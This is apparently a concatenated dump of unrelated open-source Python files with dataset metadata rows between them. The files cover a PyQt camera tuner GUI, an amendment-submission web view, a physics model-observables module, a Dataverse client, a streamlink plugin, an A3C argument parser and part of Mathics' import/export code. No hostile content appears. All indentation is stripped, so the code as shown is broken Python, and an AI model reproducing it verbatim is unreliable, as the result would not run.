self.QLabel_value.setText(str(value))
# Notify the parent that the user changed the value with mouse.
# Let the parent decide what to do with the gui event.
self.parent.user_changed_value(self.name, value)
def set_value(self, value):
'''
Set the value of self.QSlider and self.QLabel_value
Note that this only sets the displayed value without invoking any downstream action
This method is not invoked by user interaction
This method is only for displaying value
'''
if value >= self.min and value <= self.max:
self.value = value
self.QSlider.setValue(value)
self.QLabel_value.setText(str(value))
class TunerWindow(QtGui.QWidget):
'''
A gui template window for tuning parameters.
This class does not contain any business logic.
All it does is to provide an interface to adjust parameters through gui.
Each parameter is wrapped in a 'block' of SliderWidget object.
Properties (name, min, max, value, interval)
of each parameter is stored in the SliderWidget object.
'''
def __init__(self):
super(TunerWindow, self).__init__()
self.vbox = QtGui.QVBoxLayout()
self.setLayout(self.vbox)
self.widgets = {} # a dictionary of widgets, indexed by the name of each parameter
def add_parameter(self, name, min, max, value, interval):
'''
Add a new SliderWidget object holding all information of the new parameter.
'''
widget = SliderWidget(parent = self,
name = name,
min = min,
max = max,
value = value,
interval = interval)
# Add the widget to the dictionary
self.widgets[name] = widget
# Insert the widget to the last row of the V box
self.vbox.insertWidget(len(self.vbox), widget)
def add_widget(self, widget):
'''
Insert QWidget object to the last row of self.vbox (QVBoxLayout)
'''
self.vbox.insertWidget(len(self.vbox), widget)
def set_parameter(self, name, value):
'''
Set the widget slider value
'''
# If the name is not present in self.parameters then do nothing
if self.widgets.get(name, None) is None:
return
self.widgets[name].set_value(value)
def user_changed_value(self, name, value):
'''
To be overridden.
Decides what to do when the child widget slider_released() method is called...
which is invoked upon user mouse action
'''
pass
class CameraTunerWindow(TunerWindow):
'''
Inherits from the TunerWindow class.
The business logics for the camera imaging parameters is specified in this class.
This class manages the transfer of camera parameters to the core object.
'''
def __init__(self, controller, which_cam, paired, parent):
super(CameraTunerWindow, self).__init__()
self.controller = controller
self.which_cam = which_cam
self.parent = parent
self.setWindowIcon(QtGui.QIcon('icons/windu_vision.png'))
self.setMinimumWidth(600)
title = {CAM_R: 'Right Camera' ,
CAM_L: 'Left Camera' ,
CAM_E: 'Ambient Camera'}
self.setWindowTitle(title[which_cam])
self.__init__load_parameters()
if paired:
# If this CameraTunerWindow object is paired to another camera, e.g. left and right cameras
# then add a check box for toggling the synchronization of the two cameras
self.sync_box = QtGui.QCheckBox(parent=self)
self.sync_box.setText('Sync Control')
self.sync_box.toggled.connect(self.user_changed_sync)
self.add_widget(self.sync_box)
def __init__load_parameters(self):
'''
Load parameters from the .json file, and set the values of the QSliders
'''
filepath = 'parameters/' + self.which_cam + '.json'
with open(filepath, 'r') as fh:
P = json.loads(fh.read())
self.add_parameter(name='brightness' , min=0 , max=255 , value=P['brightness' ], interval=5 )
self.add_parameter(name='contrast' , min=0 , max=255 , value=P['contrast' ], interval=5 )
self.add_parameter(name='saturation' , min=0 , max=255 , value=P['saturation' ], interval=5 )
self.add_parameter(name='gain' , min=0 , max=127 , value=P['gain' ], interval=1 )
self.add_parameter(name='exposure' , min=-7 , max=-1 , value=P['exposure' ], interval=1 )
self.add_parameter(name='white_balance' , min=3000, max=6500, value=P['white_balance'], interval=100)
self.add_parameter(name='focus' , min=0 , max=255 , value=P['focus' ], interval=5 )
self.isManual = {}
for name in ['brightness', 'contrast', 'saturation', 'gain', 'exposure', 'white_balance', 'focus']:
self.isManual[name] = True
def user_changed_sync(self):
'''
User (mouse action) check or uncheck the self.sync_box
'''
self.parent.user_changed_sync(self.which_cam, self.sync_box.isChecked())
def set_sync(self, isChecked):
'''
Accessed by external object to set the state of self.sync_box
'''
self.sync_box.setChecked(isChecked)
def user_changed_value(self, name, value):
'''
Called by the child widget method slider_released().
Transfers parameters to the core object via the controller.
'''
self.parent.user_changed_value(self.which_cam, name, value)
self.apply_parameter(name, value)
def apply_parameter(self, name, value):
'''
Apply the camera parameter value to the core object throught the controller
i.e. configuring the camera hardware
'''
# Decides whether or not to apply the parameter to configure the camera hardware
if not self.isManual[name]:
return
data = {'which_cam': self.which_cam,
'parameters': {name: value}}
self.controller.call_method( method_name = 'apply_camera_parameters',
arg = data )
def auto_cam_resumed(self):
'''
Auto camera tuning mainly works on gain and exposure
So set these two parameters to isManual = False...
to prevent user from changing it
'''
for name in ['gain', 'exposure']:
self.isManual[name] = False
def auto_cam_paused(self):
'''
Change gain and exposure back to isManual = True
'''
for name in ['gain', 'exposure']:
self.isManual[name] = True
class CameraTunerWindowSet(object):
'''
This class possesses the three CameraTunerWindow: CAM_R, CAM_L, CAM_E
This class should have the basic methods (interface) that the child CameraTunerWindow has,
e.g. show(), hide(), close() ...
'''
def __init__(self, controller):
# Instantiate three CameraTunerWindow objects
# Collect them in a dictionary
self.windows = {}
self.windows[CAM_R] = CameraTunerWindow(controller, CAM_R, paired=True , parent=self)
self.windows[CAM_L] = CameraTunerWindow(controller, CAM_L, paired=True , parent=self)
self.windows[CAM_E] = CameraTunerWindow(controller, CAM_E, paired=False, parent=self)
self.isSync = False
def show(self):
for i, win in enumerate(self.windows.values()):
win.move(200+200*i, 200)
win.show()
def hide(self):
for win in self.windows.values():
win.hide()
def close(self):
for win in self.windows.values():
win.close()
def set_parameter(self, which_cam, name, value):
self.windows[which_cam].set_parameter(name, value)
def auto_cam_resumed(self):
for win in self.windows.values():
win.auto_cam_resumed()
def auto_cam_paused(self):
for win in self.windows.values():
win.auto_cam_paused()
def user_changed_value(self, which_cam, name, value):
if which_cam == CAM_L and self.isSync:
self.windows[CAM_R].set_parameter(name, value)
self.windows[CAM_R].apply_parameter(name, value)
elif which_cam == CAM_R and self.isSync:
self.windows[CAM_L].set_parameter(name, value)
self.windows[CAM_L].apply_parameter(name, value)
def user_changed_sync(self, which_cam, isChecked):
if which_cam == CAM_L:
self.windows[CAM_R].set_sync(isChecked)
if which_cam == CAM_R:
self.windows[CAM_L].set_sync(isChecked)
self.isSync = isChecked
class DepthTunerWindow(TunerWindow):
'''
Inherits from the TunerWindow class.
The business logics for the actual depth parameters
to be tuned is specified in this class.
This class also manages the transfer of depth parameters
to the core object.
'''
def __init__(self, controller):
super(DepthTunerWindow, self).__init__()
self.controller = controller
self.setWindowIcon(QtGui.QIcon('icons/windu_vision.png'))
self.setWindowTitle('Stereo Depth Parameters')
self.setMinimumWidth(600)
self.add_parameter(name='ndisparities', min=0, max=160, value=32, interval=16)
self.add_parameter(name='SADWindowSize', min=5, max=105, value=31, interval=2)
def user_changed_value(self):
'''
Transfers parameters to the core object via the controller.
'''
parms = {}
for p in self.parameters.values():
parms[p.name] = p.value
self.controller.call_method( method_name = 'apply_depth_parameters',
arg = parms )
| mit | 1,961,563,425,208,689,200 | 34.217391 | 109 | 0.601646 | false | 3.998026 | false | false | false |
ecreall/nova-ideo | novaideo/views/amendment_management/submit.py | 1 | 7416 | # Copyright (c) 2014 by Ecreall under licence AGPL terms
# available on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
import colander
import deform
from pyramid.view import view_config
from pyramid.threadlocal import get_current_registry
import html_diff_wrapper
from dace.processinstance.core import DEFAULTMAPPING_ACTIONS_VIEWS
from pontus.form import FormView
from pontus.view_operation import MultipleView
from pontus.schema import Schema, omit
from pontus.view import BasicView
from pontus.default_behavior import Cancel
from pontus.widget import TextInputWidget
from novaideo.content.processes.amendment_management.behaviors import (
SubmitAmendment)
from novaideo.content.amendment import Amendment, Intention
from novaideo.widget import (
DragDropSelect2Widget,
DragDropSequenceWidget,
DragDropMappingWidget,
LimitedTextAreaWidget)
from novaideo import _
from novaideo.utilities.amendment_viewer import IAmendmentViewer
def get_default_explanations_groups(context):
explanations = dict(context.explanations)
groups = []
grouped_explanations = []
for explanation in explanations.values():
if not(explanation['oid'] in grouped_explanations):
group = [e for e in explanations.values()
if Intention.eq(explanation['intention'], e['intention'])]
grouped_explanations.extend([e['oid'] for e in group])
groups.append(group)
if len(grouped_explanations) == len(explanations):
break
return groups
@colander.deferred
def explanations_choice(node, kw):
context = node.bindings['context']
values = [(i['oid'], i['oid']) for i in context.explanations.values()]
return DragDropSelect2Widget(values=values,
item_css_class="col-md-4",
multiple=True)
class ExplanationGroupSchema(Schema):
title = colander.SchemaNode(
colander.String(),
missing="",
widget=TextInputWidget(css_class="title-select-item",
item_css_class="col-md-4",
readonly=True)
)
explanations = colander.SchemaNode(
colander.Set(),
widget=explanations_choice,
missing=[],
default=[],
title=_('Improvements'),
)
justification = colander.SchemaNode(
colander.String(),
widget=LimitedTextAreaWidget(limit=350,
css_class="justification-select-item",
item_css_class="col-md-4",
placeholder=_("Justification")),
missing="",
title=_("Justification")
)
@colander.deferred
def groups_widget(node, kw):
context = node.bindings['context']
return DragDropSequenceWidget(
item_css_class="explanation-groups",
item_title_template=context.title+'-',
node_description=_("To do so, you can drag-and-drop your improvements "
"from one amendment to the other, add amendments or "
"suppress the empty ones."),
max_len=len(context.explanations))
class ExplanationGroupsSchema(Schema):
groups = colander.SchemaNode(
colander.Sequence(),
omit(ExplanationGroupSchema(name='Amendment',
widget=DragDropMappingWidget()),
['_csrf_token_']),
widget=groups_widget,
title=_('Group your improvements into amendments')
)
single_amendment = colander.SchemaNode(
colander.Boolean(),
widget=deform.widget.CheckboxWidget(css_class="single-amendment-control"),
label=_('Group the improvements into a single amendment'),
title='',
missing=False
)
justification = colander.SchemaNode(
colander.String(),
widget=LimitedTextAreaWidget(limit=350,
item_css_class="justification-amendment hide-bloc",
placeholder=_("Justification")),
missing="",
title=_("Justification")
)
class SubmitAmendmentViewStudyReport(BasicView):
title = _('Alert for publication')
name = 'alertforpublication'
template = 'novaideo:views/amendment_management/templates/alert_amendment_submit.pt'
readonly_explanation_template = 'novaideo:views/amendment_management/templates/readonly/submit_explanation_item.pt'
def update(self):
result = {}
amendment_viewer = get_current_registry().getUtility(
IAmendmentViewer,
'amendment_viewer')
souptextdiff, explanations = amendment_viewer.get_explanation_diff(
self.context, self.request)
amendment_viewer.add_details(explanations,
self.context,
self.request,
souptextdiff,
self.readonly_explanation_template)
text_diff = html_diff_wrapper.soup_to_text(souptextdiff)
not_published_ideas = []
if not self.request.moderate_ideas:
not_published_ideas = [i for i in self.context.get_used_ideas()
if 'published' not in i.state]
values = {'context': self.context,
'explanationtext': text_diff,
'not_published_ideas': not_published_ideas}
body = self.content(args=values, template=self.template)['body']
item = self.adapt_item(body, self.viewid)
result['coordinates'] = {self.coordinates: [item]}
return result
class SubmitAmendmentView(FormView):
title = _('Submit')
name = 'submitamendmentform'
formid = 'formsubmitamendment'
schema = ExplanationGroupsSchema()
behaviors = [SubmitAmendment, Cancel]
validate_behaviors = False
css_class = 'panel-transparent'
def default_data(self):
groups = get_default_explanations_groups(self.context)
data = {'groups': []}
i = 1
for group in groups:
justification = ''.join(list(set([e['intention']['comment'] for e in group])))
group_data = {'title': self.context.title +'-'+str(i),
'explanations': [str(e['oid']) for e in group],
'justification': justification}
data['groups'].append(group_data)
i += 1
return data
@view_config(
name='submitamendment',
context=Amendment,
renderer='pontus:templates/views_templates/grid.pt',
)
class SubmitAmendmentViewMultipleView(MultipleView):
title = _('Prepare amendments')
name = 'submitamendment'
viewid = 'submitamendment'
template = 'daceui:templates/mergedmultipleview.pt'
views = (SubmitAmendmentViewStudyReport, SubmitAmendmentView)
behaviors = [SubmitAmendment]
validators = [SubmitAmendment.get_validator()]
requirements = {'css_links': ['novaideo:static/css/organize_amendments.css'],
'js_links': ['novaideo:static/js/organize_amendments.js',
'novaideo:static/js/jquery.elastic.source.js']}
css_class = 'panel-transparent'
DEFAULTMAPPING_ACTIONS_VIEWS.update(
{SubmitAmendment: SubmitAmendmentViewMultipleView})
| agpl-3.0 | -2,999,962,509,159,644,700 | 35.17561 | 119 | 0.618528 | false | 4.094975 | false | false | false |
jbernhard/qm2017 | qm/model.py | 1 | 6803 | """ model output """
import logging
from pathlib import Path
import pickle
from hic import flow
import numpy as np
from sklearn.externals import joblib
from . import workdir, cachedir, systems, expt
from .design import Design
# TODO move this symmetric cumulant code to hic
def csq(x):
"""
Return the absolute square |x|^2 of a complex array.
"""
return (x*x.conj()).real
def corr2(Qn, M):
"""
Compute the two-particle correlation <v_n^2>.
"""
return (csq(Qn) - M).sum() / (M*(M - 1)).sum()
def symmetric_cumulant(events, m, n):
"""
Compute the symmetric cumulant SC(m, n).
"""
M = np.asarray(events['M'], dtype=float)
Q = dict(enumerate(events['Qn'].T, start=1))
cm2n2 = (
csq(Q[m]) * csq(Q[n])
- 2*(Q[m+n] * Q[m].conj() * Q[n].conj()).real
- 2*(Q[m] * Q[m-n].conj() * Q[n].conj()).real
+ csq(Q[m+n]) + csq(Q[m-n])
- (M - 4)*(csq(Q[m]) + csq(Q[n]))
+ M*(M - 6)
).sum() / (M*(M - 1)*(M - 2)*(M - 3)).sum()
cm2 = corr2(Q[m], M)
cn2 = corr2(Q[n], M)
return cm2n2 - cm2*cn2
# fully specify numeric data types, including endianness and size, to
# ensure consistency across all machines
float_t = '<f8'
int_t = '<i8'
complex_t = '<c16'
class ModelData:
"""
Helper class for event-by-event model data. Reads binary data files and
computes centrality-binned observables.
"""
dtype = np.dtype([
('initial_entropy', float_t),
('mult_factor', float_t),
('nsamples', int_t),
('dNch_deta', float_t),
('dN_dy', [(s, float_t) for s in ['pion', 'kaon', 'proton']]),
('mean_pT', [(s, float_t) for s in ['pion', 'kaon', 'proton']]),
('M', int_t),
('Qn', complex_t, 6),
])
def __init__(self, *files):
# read each file using the above dtype and treat each as a minimum-bias
# event sample
def load_events(f):
logging.debug('loading %s', f)
d = np.fromfile(str(f), dtype=self.dtype)
d.sort(order='dNch_deta')
return d
self.events = [load_events(f) for f in files]
def observables_like(self, data, *keys):
"""
Compute the same centrality-binned observables as contained in `data`
with the same nested dict structure.
This function calls itself recursively, each time prepending to `keys`.
"""
try:
x = data['x']
cent = data['cent']
except KeyError:
return {
k: self.observables_like(v, k, *keys)
for k, v in data.items()
}
def _compute_bin():
"""
Choose a function to compute the current observable for a single
centrality bin.
"""
obs_stack = list(keys)
obs = obs_stack.pop()
if obs == 'dNch_deta':
return lambda events: events[obs].mean()
if obs == 'dN_dy':
species = obs_stack.pop()
return lambda events: events[obs][species].mean()
if obs == 'mean_pT':
species = obs_stack.pop()
return lambda events: np.average(
events[obs][species],
weights=events['dN_dy'][species]
)
if obs.startswith('vn'):
n = obs_stack.pop()
k = 4 if obs == 'vn4' else 2
return lambda events: flow.Cumulant(
events['M'], *events['Qn'].T[1:]
).flow(n, k, imaginary='zero')
if obs.startswith('sc'):
mn = obs_stack.pop()
return lambda events: symmetric_cumulant(events, *mn)
compute_bin = _compute_bin()
def compute_all_bins(events):
n = events.size
bins = [
events[int((1 - b/100)*n):int((1 - a/100)*n)]
for a, b in cent
]
return list(map(compute_bin, bins))
return dict(
x=x, cent=cent,
Y=np.array(list(map(compute_all_bins, self.events))).squeeze()
)
def observables(system, map_point=False):
"""
Compute model observables for the given system to match the corresponding
experimental data.
"""
if map_point:
files = [Path('map', system)]
cachefile = Path(system + '_map')
else:
# expected filenames for each design point
files = [Path(system, p) for p in Design(system).points]
cachefile = Path(system)
files = [workdir / 'model_output' / f.with_suffix('.dat') for f in files]
cachefile = cachedir / 'model' / cachefile.with_suffix('.pkl')
if cachefile.exists():
# use the cache unless any of the model data files are newer
# this DOES NOT check any other logical dependencies, e.g. the
# experimental data
# to force recomputation, delete the cache file
mtime = cachefile.stat().st_mtime
if all(f.stat().st_mtime < mtime for f in files):
logging.debug('loading observables cache file %s', cachefile)
return joblib.load(cachefile)
else:
logging.debug('cache file %s is older than event data', cachefile)
else:
logging.debug('cache file %s does not exist', cachefile)
logging.info(
'loading %s%s event data and computing observables',
system,
'_map' if map_point else ''
)
data = expt.data[system]
# identified particle data are not yet available for PbPb5020
# create dummy entries for these observables so that they are computed for
# the model
if system == 'PbPb5020':
data = dict(
((obs, expt.data['PbPb2760'][obs])
for obs in ['dN_dy', 'mean_pT']),
**data
)
# also compute "extra" data for the MAP point
if map_point:
data = dict(expt.extra_data[system], **data)
# flow correlations and central flow not yet available for PbPb5020
if system == 'PbPb5020':
data = dict(
((obs, expt.extra_data['PbPb2760'][obs])
for obs in ['sc', 'sc_central', 'vn_central']),
**data
)
data = ModelData(*files).observables_like(data)
logging.info('writing cache file %s', cachefile)
cachefile.parent.mkdir(exist_ok=True)
joblib.dump(data, cachefile, protocol=pickle.HIGHEST_PROTOCOL)
return data
data = {s: observables(s) for s in systems}
map_data = {s: observables(s, map_point=True) for s in systems}
if __name__ == '__main__':
from pprint import pprint
print('design:')
pprint(data)
print('map:')
pprint(map_data)
| mit | -6,326,045,663,442,107,000 | 27.584034 | 79 | 0.541232 | false | 3.576761 | false | false | false |
himanshuo/osf.io | website/addons/dataverse/client.py | 3 | 2660 | import httplib as http
from dataverse import Connection
from framework.exceptions import HTTPError
from website.addons.dataverse import settings
def connect(username, password, host=settings.HOST):
connection = Connection(
username=username,
password=password,
host=host,
disable_ssl=not settings.VERIFY_SSL,
)
return connection if connection.connected else None
def connect_from_settings(user_settings):
return connect(
user_settings.dataverse_username,
user_settings.dataverse_password
) if user_settings else None
def connect_or_403(username, password, host=settings.HOST):
connection = Connection(
username=username,
password=password,
host=host,
disable_ssl=not settings.VERIFY_SSL,
)
if connection.status == http.FORBIDDEN:
raise HTTPError(http.FORBIDDEN)
return connection if connection.connected else None
def connect_from_settings_or_403(user_settings):
return connect_or_403(
user_settings.dataverse_username,
user_settings.dataverse_password
) if user_settings else None
def delete_file(file):
study = file.study
study.delete_file(file)
def upload_file(study, filename, content):
study.upload_file(filename, content)
def get_file(study, filename, released=False):
return study.get_file(filename, released)
def get_file_by_id(study, file_id, released=False):
return study.get_file_by_id(file_id, released)
def get_files(study, released=False):
return study.get_files(released)
def release_study(study):
return study.release()
def get_studies(dataverse):
if dataverse is None:
return [], []
accessible_studies = []
bad_studies = [] # Currently none, but we may filter some out
for s in dataverse.get_studies():
accessible_studies.append(s)
return accessible_studies, bad_studies
def get_study(dataverse, hdl):
if dataverse is None:
return
study = dataverse.get_study_by_doi(hdl)
try:
if study.get_state() == 'DEACCESSIONED':
raise HTTPError(http.GONE)
return study
except UnicodeDecodeError:
raise HTTPError(http.NOT_ACCEPTABLE)
def get_dataverses(connection):
if connection is None:
return []
dataverses = connection.get_dataverses()
released_dataverses = [d for d in dataverses if d.is_released]
return released_dataverses
def get_dataverse(connection, alias):
if connection is None:
return
dataverse = connection.get_dataverse(alias)
return dataverse if dataverse and dataverse.is_released else None
| apache-2.0 | -7,594,533,291,548,695,000 | 24.825243 | 69 | 0.692481 | false | 3.8 | false | false | false |
melmorabity/streamlink | src/streamlink/plugins/app17.py | 5 | 1780 | import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import useragents
from streamlink.stream import HLSStream, RTMPStream, HTTPStream
API_URL = "https://api-dsa.17app.co/api/v1/liveStreams/getLiveStreamInfo"
_url_re = re.compile(r"https://17.live/live/(?P<channel>[^/&?]+)")
_status_re = re.compile(r'\\"closeBy\\":\\"\\"')
_rtmp_re = re.compile(r'\\"url\\"\s*:\s*\\"(.+?)\\"')
class App17(Plugin):
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url)
def _get_streams(self):
match = _url_re.match(self.url)
channel = match.group("channel")
self.session.http.headers.update({'User-Agent': useragents.CHROME})
payload = '{"liveStreamID": "%s"}' % (channel)
res = self.session.http.post(API_URL, data=payload)
status = _status_re.search(res.text)
if not status:
self.logger.info("Stream currently unavailable.")
return
http_url = _rtmp_re.search(res.text).group(1)
http_url = http_url.replace("http:", "https:")
yield "live", HTTPStream(self.session, http_url)
if 'pull-rtmp' in http_url:
url = http_url.replace("https:", "rtmp:").replace(".flv", "")
stream = RTMPStream(self.session, {
"rtmp": url,
"live": True
})
yield "live", stream
if 'wansu-' in http_url:
url = http_url.replace(".flv", "/playlist.m3u8")
for stream in HLSStream.parse_variant_playlist(self.session, url).items():
yield stream
else:
url = http_url.replace("live-hdl", "live-hls").replace(".flv", ".m3u8")
yield "live", HLSStream(self.session, url)
__plugin__ = App17
| bsd-2-clause | 3,212,339,349,401,970,700 | 32.584906 | 86 | 0.57809 | false | 3.390476 | false | false | false |
woonsangcho/a3c | argparser.py | 1 | 4230 |
import argparse
import os
class ArgParser():
def __init__(self):
self.parser = argparse.ArgumentParser(description=None)
self._add_arguments()
def parse_args(self):
return self.parser.parse_args()
def _add_arguments(self):
self.parser.add_argument("--hostname", type=str, default="localhost", help="Hostname")
self.parser.add_argument("--st-port-num", type=int, default=2222, help="Starting port number for processes")
self.parser.add_argument("--job-name", type=str, default="worker", help="'One of ps' or 'worker'")
self.parser.add_argument("--task-index", type=int, default=0, help="Task index within a job")
self.parser.add_argument("--ps-hosts-num", type=int, default=1, help="The Number of Parameter Servers")
self.parser.add_argument("--worker-hosts-num", type=int, default=1, help="The Number of Workers")
self.parser.add_argument('--algo-name', default="a3c", help='Name of algorithm. For list, see README')
self.parser.add_argument('--log-dir', default=os.getcwd() + "/tmp", help='Log directory path')
self.parser.add_argument('--env-id', default="PongNoFrameskip-v4", help='Environment id')
self.parser.add_argument('--max-bootstrap-length', default=20, type=int, help='Max length of trajectory \
before bootstrapping')
self.parser.add_argument('--max-master-time-step', default=999999999999999, type=int,
help='Max number of time steps to train')
self.parser.add_argument('--max-clock-limit', default=0, type=float, help='Max clock limit to train')
self.parser.add_argument('--anneal-learning-rate', action='store_true',
help='Flag to whether to anneal learning rate or not')
self.parser.add_argument('--anneal-by-clock', action='store_true', help='Flag to anneal learning rate by clock time')
self.parser.add_argument('--use-gpu', action='store_true', help='Flag to use gpu')
def conv_layer_type(inpt):
try:
print(inpt)
tup = eval(inpt)
return tup
except:
raise argparse.ArgumentTypeError("Type in a list of 3-valued tuples e.g. [(16, 8, 4), (32, 4, 2)]\
where first value: # of filters, second value: 1-dim size of squared filter, \
third value: stride value")
self.parser.add_argument('--convs', nargs='*', default=[(32, 8, 4), (64, 4, 2), (64, 3, 1)], #(32, 8, 4), (64, 4, 2), (64, 3, 1) (16, 8, 4), (32, 4, 2)
help="Convolutional layer specification", type=conv_layer_type)
self.parser.add_argument('--hiddens', nargs='*', type=int, default=[512], # 256
help="Hidden layer specification: Type in a list of integers e.g. [256 256] where each element\
denotes the hidden layer node sizes in order given")
self.parser.add_argument('--replay-buffer-size', default=1000000, type=int, help='Replay memory size')
self.parser.add_argument('--exploration-fraction', default=0.1, type=float,
help='Exploration fraction, after which final eps is used')
self.parser.add_argument('--exploration-final-eps', default=0.05, type=float,
help='Exploration afinal eps after exploration fraction * max time step.')
self.parser.add_argument('--replay-start-size', default=50000, type=int,
help='random policy timesteps before actual learning begins')
self.parser.add_argument('--train-update-freq', default=5, type=int,
help='number of actions between successive SGD updates') #4
self.parser.add_argument('--minibatch-size', default=32, type=int, help='minibatch size for SGD')
self.parser.add_argument('--target-network-update-freq', default=10000, type=int,
help='target network update freq to stabilize learning')
| mit | 6,432,203,380,480,910,000 | 69.5 | 161 | 0.591017 | false | 4.071222 | false | false | false |
pqtoan/mathics | mathics/builtin/importexport.py | 3 | 33728 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Importing and Exporting
"""
from __future__ import unicode_literals
from __future__ import absolute_import
import six
from mathics.core.expression import Expression, from_python, strip_context
from mathics.builtin.base import Builtin, Predefined, Symbol, String
from mathics.builtin.options import options_to_rules
from .pymimesniffer import magic
import mimetypes
import sys
from itertools import chain
import urllib
try:
import urllib.request as urllib2
from urllib.error import HTTPError, URLError
except ImportError:
import urllib2
from urllib2 import HTTPError, URLError
mimetypes.add_type('application/vnd.wolfram.mathematica.package', '.m')
# Seems that JSON is not registered on the mathics.net server, so we do it manually here.
# Keep in mind that mimetypes has system-dependent aspects (it inspects "/etc/mime.types" and other files).
mimetypes.add_type('application/json', '.json')
# TODO: Add more file formats
mimetype_dict = {
'application/dicom': 'DICOM',
'application/dbase': 'DBF',
'application/dbf': 'DBF',
'application/eps': 'EPS',
'application/fits': 'FITS',
'application/json': 'JSON',
'application/mathematica': 'NB',
'application/mdb': 'MDB',
'application/mbox': 'MBOX',
'application/msaccess': 'MDB',
'application/octet-stream': 'OBJ',
'application/pdf': 'PDF',
'application/pcx': 'PCX',
'application/postscript': 'EPS',
'application/rss+xml': 'RSS',
'application/rtf': 'RTF',
'application/sla': 'STL',
'application/tga': 'TGA',
'application/vnd.google-earth.kml+xml': 'KML',
'application/vnd.ms-excel': 'XLS',
'application/vnd.ms-pki.stl': 'STL',
'application/vnd.oasis.opendocument.spreadsheet': 'ODS',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet': 'XLSX', # nopep8
'application/vnd.sun.xml.calc': 'SXC',
'application/vnd.msaccess': 'MDB',
'application/vnd.wolfram.cdf': 'CDF',
'application/vnd.wolfram.cdf.text': 'CDF',
'application/vnd.wolfram.mathematica.package': 'Package',
'application/xhtml+xml': 'XHTML',
'application/xml': 'XML',
'application/x-3ds': '3DS',
'application/x-cdf': 'NASACDF',
'application/x-eps': 'EPS',
'application/x-flac': 'FLAC',
'application/x-font-bdf': 'BDF',
'application/x-hdf': 'HDF',
'application/x-msaccess': 'MDB',
'application/x-netcdf': 'NetCDF',
'application/x-shockwave-flash': 'SWF',
'application/x-tex': 'TeX', # Also TeX
'audio/aiff': 'AIFF',
'audio/basic': 'AU', # Also SND
'audio/midi': 'MIDI',
'audio/x-aifc': 'AIFF',
'audio/x-aiff': 'AIFF',
'audio/x-flac': 'FLAC',
'audio/x-wav': 'WAV',
'chemical/seq-na-genbank': 'GenBank',
'chemical/seq-aa-fasta': 'FASTA',
'chemical/seq-na-fasta': 'FASTA',
'chemical/seq-na-fastq': 'FASTQ',
'chemical/seq-na-sff': 'SFF',
'chemical/x-cif': 'CIF',
'chemical/x-daylight-smiles': 'SMILES',
'chemical/x-hin': 'HIN',
'chemical/x-jcamp-dx': 'JCAMP-DX',
'chemical/x-mdl-molfile': 'MOL',
'chemical/x-mdl-sdf': 'SDF',
'chemical/x-mdl-sdfile': 'SDF',
'chemical/x-mdl-tgf': 'TGF',
'chemical/x-mmcif': 'CIF',
'chemical/x-mol2': 'MOL2',
'chemical/x-mopac-input': 'Table',
'chemical/x-pdb': 'PDB',
'chemical/x-xyz': 'XYZ',
'image/bmp': 'BMP',
'image/eps': 'EPS',
'image/fits': 'FITS',
'image/gif': 'GIF',
'image/jp2': 'JPEG2000',
'image/jpeg': 'JPEG',
'image/pbm': 'PNM',
'image/pcx': 'PCX',
'image/pict': 'PICT',
'image/png': 'PNG',
'image/svg+xml': 'SVG',
'image/tga': 'TGA',
'image/tiff': 'TIFF',
'image/vnd.dxf': 'DXF',
'image/vnd.microsoft.icon': 'ICO',
'image/x-3ds': '3DS',
'image/x-dxf': 'DXF',
'image/x-exr': 'OpenEXR',
'image/x-icon': 'ICO',
'image/x-ms-bmp': 'BMP',
'image/x-pcx': 'PCX',
'image/x-portable-anymap': 'PNM',
'image/x-portable-bitmap': 'PBM',
'image/x-portable-graymap': 'PGM',
'image/x-portable-pixmap': 'PPM',
'image/x-xbitmap': 'XBM',
'model/x3d+xml': 'X3D',
'model/vrml': 'VRML',
'model/x-lwo': 'LWO',
'model/x-pov': 'POV',
'text/calendar': 'ICS',
'text/comma-separated-values': 'CSV',
'text/csv': 'CSV',
'text/html': 'HTML',
'text/mathml': 'MathML',
'text/plain': 'Text',
'text/rtf': 'RTF',
'text/scriptlet': 'SCT',
'text/tab-separated-values': 'TSV',
'text/texmacs': 'Text',
'text/vnd.graphviz': 'DOT',
'text/x-csrc': 'C',
'text/x-tex': 'TeX',
'text/x-vcalendar': 'VCS',
'text/x-vcard': 'VCF',
'text/xml': 'XML',
'video/avi': 'AVI',
'video/quicktime': 'QuickTime',
'video/x-flv': 'FLV',
# None: 'Binary',
}
IMPORTERS = {}
EXPORTERS = {}
def _importer_exporter_options(available_options, options, evaluation):
stream_options = []
custom_options = []
if available_options and available_options.has_form('List', None):
for name in available_options.leaves:
if isinstance(name, String):
py_name = name.get_string_value()
elif isinstance(name, Symbol):
py_name = strip_context(name.get_name())
else:
py_name = None
if py_name:
value = Builtin.get_option(options, py_name, evaluation)
if value is not None:
expr = Expression('Rule', String(py_name), value)
if py_name == 'CharacterEncoding':
stream_options.append(expr)
else:
custom_options.append(expr)
return stream_options, custom_options
class ImportFormats(Predefined):
"""
<dl>
<dt>'$ImportFormats'
<dd>returns a list of file formats supported by Import.
</dl>
>> $ImportFormats
= {...CSV,...JSON,...Text...}
"""
name = '$ImportFormats'
def evaluate(self, evaluation):
return Expression('List', *sorted(IMPORTERS.keys()))
class ExportFormats(Predefined):
"""
<dl>
<dt>'$ExportFormats'
<dd>returns a list of file formats supported by Export.
</dl>
>> $ExportFormats
= {...CSV,...SVG,...Text...}
"""
name = '$ExportFormats'
def evaluate(self, evaluation):
return Expression('List', *sorted(EXPORTERS.keys()))
class RegisterImport(Builtin):
"""
<dl>
<dt>'RegisterImport["$format$", $defaultFunction$]'
<dd>register '$defaultFunction$' as the default function used when importing from a file of type '"$format$"'.
<dt>'RegisterImport["$format$", {"$elem1$" :> $conditionalFunction1$, "$elem2$" :> $conditionalFunction2$, ..., $defaultFunction$}]'
<dd>registers multiple elements ($elem1$, ...) and their corresponding converter functions ($conditionalFunction1$, ...) in addition to the $defaultFunction$.
<dt>'RegisterImport["$format$", {"$conditionalFunctions$, $defaultFunction$, "$elem3$" :> $postFunction3$, "$elem4$" :> $postFunction4$, ...}]'
<dd>also registers additional elements ($elem3$, ...) whose converters ($postFunction3$, ...) act on output from the low-level funcions.
</dl>
First, define the default function used to import the data.
